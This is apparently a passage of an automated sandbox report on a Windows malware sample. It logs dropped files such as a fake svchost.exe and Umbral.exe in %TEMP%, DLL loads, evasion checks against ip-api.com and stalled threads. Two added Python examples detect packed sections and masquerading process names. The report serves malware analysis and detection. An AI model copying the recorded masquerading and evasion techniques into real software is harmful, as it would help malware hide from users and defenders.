              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: KvS2rT08PQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: KvS2rT08PQ.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: KvS2rT08PQ.exe | Static file information: File size 2447360 > 1048576
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
              Source: KvS2rT08PQ.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24d600
              Source: KvS2rT08PQ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: !costura.discordrpc.pdb.compressed | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed|||DiscordRPC.pdb|447C1853EECA30637A94415F07CA7CD3E384746B|27868 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed | source: ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed | source: ANDYzz-protected.exe.0.dr
              Source: Binary string: 8costura.hardcodet.wpf.taskbarnotification.pdb.compressed | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.hardcodet.wpf.taskbarnotification.pdb.compressed|||Hardcodet.Wpf.TaskbarNotification.pdb|0FF074905FAAB506531D68962300EAF21DAF3B05|97792 | source: KvS2rT08PQ.exe, 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, ANDYzz-protected.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed8 | source: ANDYzz-protected.exe, 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.discordrpc.pdb.compressed | source: ANDYzz-protected.exe.0.dr

              Data Obfuscation

              Source: svchost.exe.0.dr, Fransesco.cs | .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
              Source: Yara match | File source: 3.0.ANDYzz-protected.exe.191c1be0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000000.1646530842.00000191C1C92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: KvS2rT08PQ.exe PID: 6500, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: ANDYzz-protected.exe PID: 2736, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, type: DROPPED
              Source: Umbral.exe.0.dr | Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
              Source: ANDYzz-protected.exe.0.dr | Static PE information: section name: fgen
              Source: ANDYzz-protected.exe.0.dr | Static PE information: section name: fgen
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Code function: 0_2_00007FFD9B8800BD pushad ; iretd 0_2_00007FFD9B8800C1
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 1_2_00007FFD9B8B00BD pushad ; iretd 1_2_00007FFD9B8B00C1
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_033B313C push ebp; ret 2_2_033B3176
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Code function: 3_2_00007FFD9B79D2A5 pushad ; iretd 3_2_00007FFD9B79D2A6
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Code function: 3_2_00007FFD9B8B7963 push ebx; retf 3_2_00007FFD9B8B796A
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Code function: 3_2_00007FFD9B8B7535 push ebx; iretd 3_2_00007FFD9B8B756A
              Source: ANDYzz-protected.exe.0.dr | Static PE information: section name: fgen entropy: 7.999509357708395
              Source: ANDYzz-protected.exe.0.dr | Static PE information: section name: .text entropy: 7.969460959015525
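The static indicators in this block (a non-standard section named fgen at entropy 7.9995, a .text section near 7.97, a dropped file whose compile timestamp reads 2053, and Costura-compressed embedded assemblies) are the kind of thing worth checking with a script before any dynamic run. The Python below is an added example written for this page, not Joe Sandbox code and not code from the sample: a stdlib-only PE header walk that computes per-section Shannon entropy and flags a TimeDateStamp in the future, sections at or above an entropy threshold, and section names outside the usual linker set. The 7.9 threshold, the standard-section list and the synthetic image produced by build_test_pe are assumptions constructed for the example; against a real file, pass open(path, "rb").read() to analyse() instead.

```python
"""Static PE triage: per-section entropy, section names, and compile timestamp.
Added example for this report page; not Joe Sandbox code. Thresholds are assumptions."""
import math
import struct
import time
from datetime import datetime, timezone

ENTROPY_THRESHOLD = 7.9   # assumption: near-uniform bytes, typical of packed/encrypted data
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".pdata",
                     ".idata", ".edata", ".tls", ".bss", ".CRT"}   # assumption: common linker names


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk MZ -> PE -> COFF -> section table; return (TimeDateStamp, [(name, raw_size, raw_ptr)])."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size          # the section table follows the optional header
    sections = []
    for i in range(nsec):
        off = table + i * 40
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, raw_size, raw_ptr))
    return timestamp, sections


def analyse(pe: bytes, now=None) -> dict:
    """Return per-section entropy plus a list of human-readable findings."""
    now = time.time() if now is None else now
    timestamp, sections = parse_sections(pe)
    findings = []
    if timestamp > now:
        when = datetime.fromtimestamp(timestamp, timezone.utc)
        findings.append(f"TimeDateStamp in the future: 0x{timestamp:08X} [{when:%a %b %d %H:%M:%S %Y} UTC]")
    entropies = {}
    for name, raw_size, raw_ptr in sections:
        ent = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        entropies[name] = round(ent, 3)
        if ent >= ENTROPY_THRESHOLD:
            findings.append(f"high-entropy section {name!r}: {ent:.3f}")
        if name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {name!r}")
    return {"timestamp": timestamp, "sections": entropies, "findings": findings}


def build_test_pe(sections, timestamp: int) -> bytes:
    """Constructed minimal PE32+ image for offline testing; headers are only as complete as the parser needs."""
    e_lfanew, opt_size, nsec = 0x40, 0xF0, len(sections)
    header_end = e_lfanew + 4 + 20 + opt_size + 40 * nsec
    first_raw = (header_end + 0x1FF) & ~0x1FF     # 0x200 file alignment
    raw_ptr = first_raw
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, nsec, timestamp, 0, 0, opt_size, 0x22)
    table, body = b"", b""
    for name, data in sections:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIIIIIHHI", len(data), raw_ptr, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    image = dos + b"PE\0\0" + coff + b"\0" * opt_size + table
    return image.ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    # Constructed sample: a low-entropy .text, a uniform 'fgen' section, and the report's 2053 timestamp.
    sample = build_test_pe([(".text", b"\x90" * 2000 + b"\xCC\xC3" * 48),
                            ("fgen", bytes(range(256)) * 16)], 0x9C61056C)
    for finding in analyse(sample)["findings"]:
        print(finding)
```

Embedded assemblies compressed by Costura (the costura.*.pdb.compressed strings above) read as high-entropy bytes just as a packer's payload does, so this check says "packed or compressed", not "malicious"; the timestamp check is the stronger single signal, since a legitimate linker does not stamp a file three decades ahead.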

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\Umbral.exe
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
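The drops listed above include a svchost.exe written to %TEMP%, which is the pattern behind the "Drops PE files with benign system names" and Sigma "System File Execution Location Anomaly" verdicts: a name from the Windows process set appearing anywhere other than where that binary legitimately lives. The Python below is an added example for this page, not Joe Sandbox's or Sigma's code. It applies that logic to event lines in the "Source: ... | event: path" form used in this section, resolving the directory with PureWindowsPath so the comparison is case-insensitive and covers WinSxS subdirectories. The process-name set and the legitimate-directory list are trimmed assumptions for the example; the sample events are constructed from the drops in this report plus benign controls that must not fire.

```python
"""Flag Windows system-process names running from, or written to, unexpected directories.
Added example for this report page; not Joe Sandbox or Sigma code. Name and directory lists are assumptions."""
import re
from pathlib import PureWindowsPath

# Assumption: trimmed set of names that dropped payloads commonly borrow.
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "lsass.exe", "csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
    "services.exe", "spoolsv.exe", "taskhostw.exe", "dllhost.exe", "conhost.exe", "explorer.exe",
}
# Assumption: directories (including subdirectories) where those binaries legitimately live.
LEGITIMATE_ROOTS = [PureWindowsPath(p) for p in (
    r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS", r"C:\Windows\servicing",
)]
LEGITIMATE_FILES = {PureWindowsPath(r"C:\Windows\explorer.exe")}   # explorer sits directly in C:\Windows

EVENT_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<event>File created|Process created):\s*"
    r"(?P<target>[A-Za-z]:\\\S+?\.exe)\b", re.IGNORECASE)


def is_masquerading(path_str: str) -> bool:
    """True when the file name is a system-process name but the path is outside every legitimate root."""
    path = PureWindowsPath(path_str)
    if path.name.lower() not in SYSTEM_PROCESS_NAMES:
        return False
    if path in LEGITIMATE_FILES:                      # PureWindowsPath compares case-insensitively
        return False
    return not any(root in path.parents for root in LEGITIMATE_ROOTS)


def find_masquerades(lines):
    """Scan report-style event lines; return (event, target, source) for each suspicious path."""
    hits = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m and is_masquerading(m["target"]):
            hits.append((m["event"], m["target"], m["source"]))
    return hits


# Constructed sample: the drops from this report plus benign controls that must not fire.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe",
    r"Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\Umbral.exe",
    r"Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe",
    r"Source: C:\Windows\System32\services.exe | Process created: C:\Windows\System32\svchost.exe -k netsvcs",
    r"Source: C:\Windows\System32\services.exe | Process created: C:\Windows\SysWOW64\svchost.exe -k LocalService",
    r"Source: C:\Windows\System32\userinit.exe | Process created: C:\WINDOWS\explorer.exe",
    r"Source: C:\Windows\System32\TrustedInstaller.exe | File created: C:\Windows\WinSxS\amd64_example\svchost.exe",
]

if __name__ == "__main__":
    for event, target, source in find_masquerades(SAMPLE_EVENTS):
        print(f"{event}: {target}  (by {source})")
```

Matching on the directory rather than on the name alone is what keeps the rule quiet on a healthy host, where services.exe spawns dozens of svchost.exe instances from System32 and SysWOW64 every boot; the two hits the sample produces are exactly the %TEMP% svchost.exe this report dropped and later executed.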
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process information set: NOOPENFILEERRORBOX (17 occurrences)
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information set: NOOPENFILEERRORBOX (36 occurrences)
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Process information set: NOOPENFILEERRORBOX (64 occurrences)
              Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)

              Malware Analysis System Evasion

              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Memory allocated: 8E0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Memory allocated: 1A790000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 253F9290000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Memory allocated: 253FACF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 3A90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 3A90000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Memory allocated: 5A90000 memory commit | memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Memory allocated: 191C2180000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Memory allocated: 191DBC80000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599874
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599762
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599656
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599546
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599435
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599308
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599201
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 599093
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598983
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598875
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598765
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598656
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598545
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598437
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598328
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598218
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Thread delayed: delay time: 598109
